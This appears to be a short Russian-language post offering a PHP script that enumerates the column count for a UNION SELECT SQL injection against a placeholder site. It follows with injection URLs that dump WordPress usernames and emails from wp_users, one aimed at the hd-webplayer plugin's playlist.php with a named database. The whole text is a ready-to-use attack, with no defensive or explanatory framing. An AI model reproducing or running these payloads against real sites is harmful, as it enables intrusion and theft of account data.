PHP скрипт для подбора union+select при SQL INJECTION ...Получение пароля admin в WordPress

<?php
$str="http://www.SOMESITE.com/page.php?ID=-3+union+select+";
$gl=1;

for($i=2;$i<=40;$i++)
{
    $gl=$gl.",".$i;
    $url=$str.$gl.'+--+';
   
    $content= file_get_contents($url);
    echo $url."<br>";
    echo $content;
}
?>

http://www.SOMESITE.com/page.php?ID=-3+union+select+1,group_concat%28user_login,0x3a,%20%20user_email%29,3,4+from+wp_users--



Возможен вариант:

http://www.SOMESITE.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,group_concat%28user_login,0x3a,%20%20user_email%29,3,4+from+friendfolks_weblog.wp_users--